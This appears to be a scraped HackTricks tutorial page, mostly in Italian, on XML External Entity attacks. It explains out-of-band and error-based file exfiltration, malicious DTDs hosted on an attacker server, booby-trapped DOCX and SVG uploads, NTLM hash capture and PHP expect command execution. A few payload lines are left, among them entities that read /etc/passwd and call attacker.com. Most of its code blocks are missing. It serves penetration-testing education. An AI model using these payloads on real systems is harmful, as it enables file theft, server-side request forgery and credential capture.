XXE - XEE - XML External Entity
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
XML è un linguaggio di markup progettato per l'archiviazione e il trasporto dei dati, con una struttura flessibile che consente l'uso di tag nominati in modo descrittivo. Si differenzia da HTML in quanto non è limitato a un insieme di tag predefiniti. L'importanza di XML è diminuita con l'ascesa di JSON, nonostante il suo ruolo iniziale nella tecnologia AJAX.
Rappresentazione dei Dati tramite Entità: Le entità in XML consentono la rappresentazione dei dati, inclusi caratteri speciali come <
e >
, che corrispondono a <
e >
per evitare conflitti con il sistema di tag di XML.
Definizione degli Elementi XML: XML consente la definizione dei tipi di elemento, delineando come gli elementi devono essere strutturati e quali contenuti possono contenere, che vanno da qualsiasi tipo di contenuto a specifici elementi figli.
Definizione del Tipo di Documento (DTD): I DTD sono cruciali in XML per definire la struttura del documento e i tipi di dati che può contenere. Possono essere interni, esterni o una combinazione, guidando come i documenti sono formattati e convalidati.
Entità Personalizzate ed Esterne: XML supporta la creazione di entità personalizzate all'interno di un DTD per una rappresentazione flessibile dei dati. Le entità esterne, definite con un URL, sollevano preoccupazioni di sicurezza, in particolare nel contesto degli attacchi XML External Entity (XXE), che sfruttano il modo in cui i parser XML gestiscono le fonti di dati esterne: <!DOCTYPE foo [ <!ENTITY myentity "value" > ]>
Rilevamento XXE con Entità Parametro: Per rilevare vulnerabilità XXE, specialmente quando i metodi convenzionali falliscono a causa delle misure di sicurezza del parser, possono essere utilizzate entità parametro XML. Queste entità consentono tecniche di rilevamento out-of-band, come l'attivazione di lookup DNS o richieste HTTP a un dominio controllato, per confermare la vulnerabilità.
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>
In questo attacco testerò se una semplice dichiarazione di una nuova ENTITÀ funziona.
Proviamo a leggere /etc/passwd
in modi diversi. Per Windows potresti provare a leggere: C:\windows\system32\drivers\etc\hosts
In questo primo caso nota che SYSTEM "**file:///**etc/passwd" funzionerà anche.
Questo secondo caso dovrebbe essere utile per estrarre un file se il server web sta utilizzando PHP (Non il caso dei laboratori di Portswigger)
In questo terzo caso, nota che stiamo dichiarando l'Element stockCheck
come ANY.
In applicazioni basate su Java potrebbe essere possibile elencare i contenuti di una directory tramite XXE con un payload come (richiedendo solo la directory invece del file):
Un XXE potrebbe essere utilizzato per abusare di un SSRF all'interno di un cloud
Utilizzando la tecnica precedentemente commentata puoi far accedere il server a un server che controlli per dimostrare che è vulnerabile. Ma, se non funziona, potrebbe essere perché le entità XML non sono consentite, in tal caso potresti provare a utilizzare entità parametriche XML:
In questa occasione faremo caricare al server un nuovo DTD con un payload malevolo che invierà il contenuto di un file tramite richiesta HTTP (per file su più righe potresti provare a esfiltrarlo tramite _ftp://_ utilizzando questo server di base ad esempio xxe-ftp-server.rb). Questa spiegazione si basa su Portswiggers lab qui.
Nel DTD malevolo fornito, vengono eseguiti una serie di passaggi per esfiltrare dati:
La struttura è la seguente:
I passaggi eseguiti da questo DTD includono:
Definizione delle Entità Parametriche:
Un'entità parametri XML, %file
, viene creata, leggendo il contenuto del file /etc/hostname
.
Un'altra entità parametri XML, %eval
, è definita. Essa dichiara dinamicamente una nuova entità parametri XML, %exfiltrate
. L'entità %exfiltrate
è impostata per effettuare una richiesta HTTP al server dell'attaccante, passando il contenuto dell'entità %file
all'interno della stringa di query dell'URL.
Esecuzione delle Entità:
L'entità %eval
è utilizzata, portando all'esecuzione della dichiarazione dinamica dell'entità %exfiltrate
.
L'entità %exfiltrate
è quindi utilizzata, attivando una richiesta HTTP all'URL specificato con i contenuti del file.
L'attaccante ospita questo DTD malevolo su un server sotto il proprio controllo, tipicamente a un URL come http://web-attacker.com/malicious.dtd
.
Payload XXE: Per sfruttare un'applicazione vulnerabile, l'attaccante invia un payload XXE:
Questo payload definisce un'entità parametro XML %xxe
e la incorpora all'interno del DTD. Quando elaborato da un parser XML, questo payload recupera il DTD esterno dal server dell'attaccante. Il parser quindi interpreta il DTD inline, eseguendo i passaggi delineati nel DTD malevolo e portando all'exfiltrazione del file /etc/hostname
al server dell'attaccante.
In questo caso faremo in modo che il server carichi un DTD malevolo che mostrerà il contenuto di un file all'interno di un messaggio di errore (questo è valido solo se puoi vedere i messaggi di errore). Esempio da qui.
Un messaggio di errore di parsing XML, che rivela i contenuti del file /etc/passwd
, può essere attivato utilizzando un Documento di Tipo Esterno (DTD) malevolo. Questo viene realizzato attraverso i seguenti passaggi:
Viene definita un'entità parametro XML chiamata file
, che contiene i contenuti del file /etc/passwd
.
Viene definita un'entità parametro XML chiamata eval
, incorporando una dichiarazione dinamica per un'altra entità parametro XML chiamata error
. Questa entità error
, quando valutata, tenta di caricare un file inesistente, incorporando i contenuti dell'entità file
come suo nome.
L'entità eval
viene invocata, portando alla dichiarazione dinamica dell'entità error
.
L'invocazione dell'entità error
comporta un tentativo di caricare un file inesistente, producendo un messaggio di errore che include i contenuti del file /etc/passwd
come parte del nome del file.
Il DTD esterno malevolo può essere invocato con il seguente XML:
Upon execution, the web server's response should include an error message displaying the contents of the /etc/passwd
file.
Si prega di notare che il DTD esterno ci consente di includere un'entità all'interno della seconda (eval
), ma è vietato nel DTD interno. Pertanto, non puoi forzare un errore senza utilizzare un DTD esterno (di solito).
Quindi, che dire delle vulnerabilità XXE cieche quando le interazioni out-of-band sono bloccate (le connessioni esterne non sono disponibili)?
Una scappatoia nella specifica del linguaggio XML può esporre dati sensibili attraverso messaggi di errore quando il DTD di un documento mescola dichiarazioni interne ed esterne. Questo problema consente la ridefinizione interna di entità dichiarate esternamente, facilitando l'esecuzione di attacchi XXE basati su errori. Tali attacchi sfruttano la ridefinizione di un'entità parametro XML, originariamente dichiarata in un DTD esterno, da un DTD interno. Quando le connessioni out-of-band sono bloccate dal server, gli attaccanti devono fare affidamento su file DTD locali per condurre l'attacco, mirando a indurre un errore di parsing per rivelare informazioni sensibili.
Considera uno scenario in cui il filesystem del server contiene un file DTD in /usr/local/app/schema.dtd
, che definisce un'entità chiamata custom_entity
. Un attaccante può indurre un errore di parsing XML rivelando il contenuto del file /etc/passwd
inviando un DTD ibrido come segue:
I passaggi delineati sono eseguiti da questo DTD:
La definizione di un'entità parametro XML chiamata local_dtd
include il file DTD esterno situato nel filesystem del server.
Si verifica una ridefinizione per l'entità parametro XML custom_entity
, originariamente definita nel DTD esterno, per racchiudere un exploit XXE basato su errore. Questa ridefinizione è progettata per provocare un errore di parsing, esponendo il contenuto del file /etc/passwd
.
Utilizzando l'entità local_dtd
, il DTD esterno viene attivato, comprendendo la nuova entità definita custom_entity
. Questa sequenza di azioni provoca l'emissione del messaggio di errore previsto dall'exploit.
Esempio del mondo reale: I sistemi che utilizzano l'ambiente desktop GNOME hanno spesso un DTD in /usr/share/yelp/dtd/docbookx.dtd
contenente un'entità chiamata ISOamso
Poiché questa tecnica utilizza un DTD interno, è necessario trovarne uno valido prima. Puoi farlo installando lo stesso SO / Software che utilizza il server e cercando alcuni DTD predefiniti, oppure prendendo un elenco di DTD predefiniti all'interno dei sistemi e controllando se qualcuno di essi esiste:
Per ulteriori informazioni controlla https://portswigger.net/web-security/xxe/blind
Nel seguente fantastico repo di github puoi trovare percorsi di DTD che possono essere presenti nel sistema:
Inoltre, se hai l'immagine Docker del sistema vittima, puoi utilizzare lo strumento dello stesso repo per scansionare l'immagine e trovare il percorso delle DTD presenti all'interno del sistema. Leggi il Readme del github per sapere come.
Per una spiegazione più approfondita di questo attacco, controlla la seconda sezione di questo post incredibile di Detectify.
La possibilità di caricare documenti Microsoft Office è offerta da molte applicazioni web, che poi procedono ad estrarre alcuni dettagli da questi documenti. Ad esempio, un'applicazione web può consentire agli utenti di importare dati caricando un foglio di calcolo in formato XLSX. Affinché il parser possa estrarre i dati dal foglio di calcolo, dovrà inevitabilmente analizzare almeno un file XML.
Per testare questa vulnerabilità, è necessario creare un file Microsoft Office contenente un payload XXE. Il primo passo è creare una directory vuota in cui il documento può essere estratto.
Una volta che il documento è stato estratto, il file XML situato in ./unzipped/word/document.xml
dovrebbe essere aperto e modificato in un editor di testo preferito (come vim). L'XML dovrebbe essere modificato per includere il payload XXE desiderato, spesso iniziando con una richiesta HTTP.
Le righe XML modificate dovrebbero essere inserite tra i due oggetti XML radice. È importante sostituire l'URL con un URL monitorabile per le richieste.
Infine, il file può essere compresso per creare il file malevolo poc.docx. Dalla directory "unzipped" precedentemente creata, dovrebbe essere eseguito il seguente comando:
Ora, il file creato può essere caricato nell'applicazione web potenzialmente vulnerabile, e si può sperare che una richiesta appaia nei log di Burp Collaborator.
Il protocollo jar è reso accessibile esclusivamente all'interno delle applicazioni Java. È progettato per consentire l'accesso ai file all'interno di un archivio PKZIP (ad es., .zip
, .jar
, ecc.), soddisfacendo sia i file locali che remoti.
Per poter accedere ai file all'interno dei file PKZIP è super utile per abusare di XXE tramite file DTD di sistema. Controlla questa sezione per imparare come abusare dei file DTD di sistema.
Il processo per accedere a un file all'interno di un archivio PKZIP tramite il protocollo jar comporta diversi passaggi:
Viene effettuata una richiesta HTTP per scaricare l'archivio zip da una posizione specificata, come https://download.website.com/archive.zip
.
La risposta HTTP contenente l'archivio viene memorizzata temporaneamente sul sistema, tipicamente in una posizione come /tmp/...
.
L'archivio viene quindi estratto per accedere ai suoi contenuti.
Il file specifico all'interno dell'archivio, file.zip
, viene letto.
Dopo l'operazione, eventuali file temporanei creati durante questo processo vengono eliminati.
Una tecnica interessante per interrompere questo processo al secondo passaggio prevede di mantenere la connessione del server aperta indefinitamente durante la fornitura del file dell'archivio. Gli strumenti disponibili in questo repository possono essere utilizzati a questo scopo, inclusi un server Python (slow_http_server.py
) e un server Java (slowserver.jar
).
Scrivere file in una directory temporanea può aiutare a escalare un'altra vulnerabilità che coinvolge un traversamento di percorso (come l'inclusione di file locali, l'iniezione di template, RCE XSLT, deserializzazione, ecc).
Su host Windows è possibile ottenere l'hash NTML dell'utente del server web impostando un gestore responder.py:
e inviando la seguente richiesta
Then you can try to crack the hash using hashcat
Quando si integrano i dati del client nei documenti XML lato server, come quelli nelle richieste SOAP di backend, il controllo diretto sulla struttura XML è spesso limitato, ostacolando gli attacchi XXE tradizionali a causa delle restrizioni sulla modifica dell'elemento DOCTYPE
. Tuttavia, un attacco XInclude
fornisce una soluzione consentendo l'inserimento di entità esterne all'interno di qualsiasi elemento di dati del documento XML. Questo metodo è efficace anche quando solo una parte dei dati all'interno di un documento XML generato dal server può essere controllata.
Per eseguire un attacco XInclude
, è necessario dichiarare lo spazio dei nomi XInclude
e specificare il percorso del file per l'entità esterna prevista. Di seguito è riportato un esempio conciso di come può essere formulato un attacco di questo tipo:
Controlla https://portswigger.net/web-security/xxe per ulteriori informazioni!
I file caricati dagli utenti su determinate applicazioni, che vengono poi elaborati sul server, possono sfruttare vulnerabilità nel modo in cui vengono gestiti i file XML o i formati di file contenenti XML. Formati di file comuni come documenti di office (DOCX) e immagini (SVG) si basano su XML.
Quando gli utenti caricano immagini, queste immagini vengono elaborate o convalidate lato server. Anche per le applicazioni che si aspettano formati come PNG o JPEG, la libreria di elaborazione delle immagini del server potrebbe supportare anche immagini SVG. SVG, essendo un formato basato su XML, può essere sfruttato dagli attaccanti per inviare immagini SVG dannose, esponendo così il server a vulnerabilità XXE (XML External Entity).
Un esempio di tale exploit è mostrato di seguito, dove un'immagine SVG dannosa tenta di leggere file di sistema:
Un altro metodo prevede di eseguire comandi attraverso il wrapper PHP "expect":
In entrambi i casi, il formato SVG viene utilizzato per lanciare attacchi che sfruttano le capacità di elaborazione XML del software del server, evidenziando la necessità di una robusta convalida degli input e misure di sicurezza.
Controlla https://portswigger.net/web-security/xxe per ulteriori informazioni!
Nota che la prima riga del file letto o del risultato dell'esecuzione apparirà DENTRO l'immagine creata. Quindi devi essere in grado di accedere all'immagine che SVG ha creato.
Leggi il seguente post per imparare come sfruttare un XXE caricando un file PDF:
Se una richiesta POST accetta i dati in formato XML, potresti provare a sfruttare un XXE in quella richiesta. Ad esempio, se una richiesta normale contiene quanto segue:
Poi potresti essere in grado di inviare la seguente richiesta, con lo stesso risultato:
Per modificare la richiesta puoi utilizzare un'estensione di Burp chiamata “Content Type Converter“. Qui puoi trovare questo esempio:
Un altro esempio può essere trovato qui.
Questo funziona solo se il server XML accetta il protocollo data://
.
Puoi usare la ["Encode Recipe" di cyberchef qui ]([https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to) per trasformare in UTF-7.
Se il web utilizza PHP, invece di usare file:/
puoi usare php wrappersphp://filter/convert.base64-encode/resource=
per accedere a file interni.
Se il web utilizza Java, puoi controllare il jar: protocol.
Trucco da https://github.com/Ambrotd/XXE-Notes Puoi creare un entità all'interno di un'entità codificandola con html entities e poi chiamarla per caricare un dtd. Nota che le HTML Entities utilizzate devono essere numeriche (come [in questo esempio](https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric entities'%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\).
Esempio di DTD:
Estrai index.php
Se il modulo "expect" di PHP è caricato
Questo esempio è ispirato a https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe
XLIFF (XML Localization Interchange File Format) è utilizzato per standardizzare lo scambio di dati nei processi di localizzazione. È un formato basato su XML principalmente utilizzato per trasferire dati localizzabili tra strumenti durante la localizzazione e come formato di scambio comune per gli strumenti CAT (Computer-Aided Translation).
Viene effettuata una richiesta al server con il seguente contenuto:
Tuttavia, questa richiesta genera un errore interno del server, menzionando specificamente un problema con le dichiarazioni di markup:
Nonostante l'errore, viene registrato un colpo su Burp Collaborator, indicando un certo livello di interazione con l'entità esterna.
Out of Band Data Exfiltration Per esfiltrare dati, viene inviata una richiesta modificata:
Questo approccio rivela che l'User Agent indica l'uso di Java 1.8. Una limitazione nota di questa versione di Java è l'incapacità di recuperare file contenenti un carattere di nuova riga, come /etc/passwd, utilizzando la tecnica Out of Band.
Error-Based Data Exfiltration Per superare questa limitazione, viene impiegato un approccio basato sugli errori. Il file DTD è strutturato come segue per attivare un errore che include dati da un file target:
Il server risponde con un errore, riflettendo importantemente il file inesistente, indicando che il server sta tentando di accedere al file specificato:
Per includere il contenuto del file nel messaggio di errore, il file DTD viene regolato:
Questa modifica porta all'exfiltrazione riuscita del contenuto del file, poiché è riflessa nell'output di errore inviato tramite HTTP. Questo indica un attacco XXE (XML External Entity) riuscito, sfruttando sia tecniche Out of Band che Error-Based per estrarre informazioni sensibili.
XML valido con formato RSS per sfruttare una vulnerabilità XXE.
Richiesta HTTP semplice al server degli attaccanti
Utilizzando il filtro base64 di PHP
XMLDecoder è una classe Java che crea oggetti basati su un messaggio XML. Se un utente malintenzionato riesce a far utilizzare a un'applicazione dati arbitrari in una chiamata al metodo readObject, otterrà immediatamente l'esecuzione di codice sul server.
Estrai info via HTTP utilizzando il proprio DTD esterno: https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/\
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)